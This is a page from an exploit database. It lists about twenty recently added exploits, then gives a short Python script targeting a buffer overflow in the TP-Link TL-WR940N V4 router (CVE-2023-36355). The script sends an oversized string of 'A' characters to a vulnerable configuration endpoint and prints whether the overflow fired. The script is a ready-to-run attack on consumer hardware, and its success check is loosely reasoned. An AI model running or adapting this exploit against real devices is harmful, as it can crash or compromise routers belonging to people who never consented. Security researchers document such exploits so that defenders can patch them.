
20 changes to exploits/shellcodes/ghdb TP-Link TL-WR940N V4 - Buffer OverFlow D-Link DAP-1325 - Broken Access Control Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting (XSS) Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE) Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE) FuguHub 8.1 - Remote Code Execution GZ Forum Script 1.8 - Stored Cross-Site Scripting (XSS) PodcastGenerator 3.2.9 - Blind SSRF via XML Injection POS Codekop v2.0 - Authenticated Remote Code Execution (RCE) Prestashop 8.0.4 - Cross-Site Scripting (XSS) Rukovoditel 3.4.1 - Multiple Stored XSS Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS) spip v4.1.10 - Spoofing Admin account Time Slot Booking Calendar 1.8 - Stored Cross-Site Scripting (XSS) Vacation Rental 1.8 - Stored Cross-Site Scripting (XSS) WBCE CMS 1.6.1 - Open Redirect & CSRF WebsiteBaker v2.13.3 - Directory Traversal WebsiteBaker v2.13.3 - Stored XSS WP AutoComplete 1.0.4 - Unauthenticated SQLi
28 lines
No EOL
868 B
Python
Executable file
28 lines
No EOL
868 B
Python
Executable file
# Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow
|
|
# Date: 2023-06-30
|
|
# country: Iran
|
|
# Exploit Author: Amirhossein Bahramizadeh
|
|
# Category : hardware
|
|
# Dork : /userRpm/WanDynamicIpV6CfgRpm
|
|
# Tested on: Windows/Linux
|
|
# CVE : CVE-2023-36355
|
|
|
|
import requests
|
|
|
|
# Replace the IP address with the router's IP
|
|
router_ip = '192.168.0.1'
|
|
|
|
# Construct the URL with the vulnerable endpoint and parameter
|
|
url = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart='
|
|
|
|
# Replace the payload with a crafted payload that triggers the buffer overflow
|
|
payload = 'A' * 5000 # Example payload, adjust the length as needed
|
|
|
|
# Send the GET request with the crafted payload
|
|
response = requests.get(url + payload)
|
|
|
|
# Check the response status code
|
|
if response.status_code == 200:
|
|
print('Buffer overflow triggered successfully')
|
|
else:
|
|
print('Buffer overflow not triggered') |